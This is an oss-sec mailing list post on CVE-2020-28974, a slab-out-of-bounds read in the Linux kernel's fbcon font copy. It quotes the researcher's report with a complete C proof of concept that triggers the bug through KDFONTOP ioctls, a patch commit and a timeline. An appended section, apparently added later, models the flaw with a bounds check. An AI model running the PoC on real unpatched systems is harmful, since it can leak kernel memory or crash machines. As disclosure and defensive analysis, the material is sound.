Re: Linux kernel slab-out-of-bounds Read in fbcon

Related Vulnerabilities: CVE-2020-28974
oss-sec mailing list archives
From: "Srivatsa S. Bhat" <srivatsa () csail mit edu>

Date: Tue, 24 Nov 2020 22:23:24 -0800

On 11/9/20 6:41 AM, Minh Yuan wrote:
Hi,

We recently discovered a slab-out-of-bounds read in fbcon in the latest
kernel (v5.10-rc2 for now).

The root cause of this vulnerability is that "fbcon_copy_font" did not
handle "vc->vc_font.data" and "vc->vc_font.height" consistently. However,
the patch <https://lkml.org/lkml/2020/9/27/223> for VT_RESIZEX and the patch
<https://lkml.org/lkml/2020/9/24/720> for fbcon_get_font() can't handle
this issue.

This is my PoC (it needs the privilege to access tty to trigger this bug):

// author by ziiiro@THU
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <fcntl.h>
#include <linux/fb.h>
#include <linux/vt.h>
#include <linux/kd.h>
#include <string.h>

int main(int argc, char** argv)
{
    struct console_font_op op;
    struct consolefontdesc cfdarg;
    void *addr = malloc(0x100);
    memset(addr,'a',0x100);
    int fd1 = open("/dev/tty1", O_RDWR, 0);
    int fd2 = open("/dev/tty6", O_RDWR, 0);
    op.op = KD_FONT_OP_SET;
    op.width = 8;
    op.height = 1;
    op.data = addr;
    op.charcount = 0x100;
    // alloc a small font.data
    ioctl(fd2,KDFONTOP,&op);
    op.height = 0x20;
    // set a large font.height
    ioctl(fd1, KDFONTOP, &op);
    op.op = KD_FONT_OP_COPY;
    // access tty6's font (for KD_FONT_OP_COPY, op.height is the 0-based
    // source console number, so 5 means tty6)
    op.height = 5;
    // use a larger height (tty1) to access the small font.data (tty6)
    ioctl(fd1,KDFONTOP,&op);
}

The patch for this bug is available: commit 3c4e0dff2095c579b142d5a0693257f1c58b4804
(https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=3c4e0dff2095c579b142d5a0693257f1c58b4804)

Timeline:
* 6/11/20 - Vulnerability reported to security () kernel org and
linux-distros () vs openwall org.
* 9/11/20 - Vulnerability patched.
* 9/11/20 - Vulnerability public.

Regards,

Yuan Ming from Tsinghua University

It looks like CVE-2020-28974 has been assigned for this issue.
https://nvd.nist.gov/vuln/detail/CVE-2020-28974

Regards,
Srivatsa
VMware Photon OS

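A user-space model of the inconsistency the report describes, added here as an illustration; it is not code from the report, the PoC or the kernel, and the linked commit remains the authoritative fix. The names `model_font`, `model_font_set`, `model_copy_read_len` and `model_copy_check` are hypothetical; the fonts are constructed in the shape the PoC sets up (8x1 and 8x32, 256 glyphs each) so the check shows why a copy driven by the destination console's height over the source console's glyph data runs past the source allocation.

```c
/* Model of the report's inconsistency: the copy is driven by the destination
 * console's font height but reads the source console's glyph data. Hypothetical
 * user-space code, not kernel code. */
#include <stddef.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

struct model_font {
    uint8_t *data;      /* glyph bitmap: charcount glyphs of height bytes (width <= 8) */
    unsigned width, height, charcount;
    size_t   data_len;  /* bytes actually allocated for data */
};

/* Mirrors what the PoC's KD_FONT_OP_SET does: width 8, the given height,
 * charcount glyphs, so the allocation is exactly charcount * height bytes. */
int model_font_set(struct model_font *f, unsigned height, unsigned charcount)
{
    size_t len = (size_t)height * charcount;
    uint8_t *buf = malloc(len);
    if (!buf)
        return -1;
    memset(buf, 'a', len);          /* constructed filler, as in the PoC */
    free(f->data);
    f->data = buf;
    f->width = 8;
    f->height = height;
    f->charcount = charcount;
    f->data_len = len;
    return 0;
}

/* Bytes the copy would read from src when it uses dst's geometry. */
size_t model_copy_read_len(const struct model_font *dst, const struct model_font *src)
{
    (void)src;  /* src's own geometry is exactly what the inconsistent path ignored */
    return (size_t)dst->height * dst->charcount;
}

/* The consistency check a copy needs before it touches src->data: the read
 * driven by dst's geometry must fit in src's allocation and widths must match.
 * Returns 0 when safe, -1 for the tall-dst/short-src mismatch the PoC builds. */
int model_copy_check(const struct model_font *dst, const struct model_font *src)
{
    if (src->width != dst->width)
        return -1;
    return model_copy_read_len(dst, src) <= src->data_len ? 0 : -1;
}
```

With the PoC's geometry the copy would read 0x2000 bytes from a 0x100-byte source buffer, which is what the check rejects.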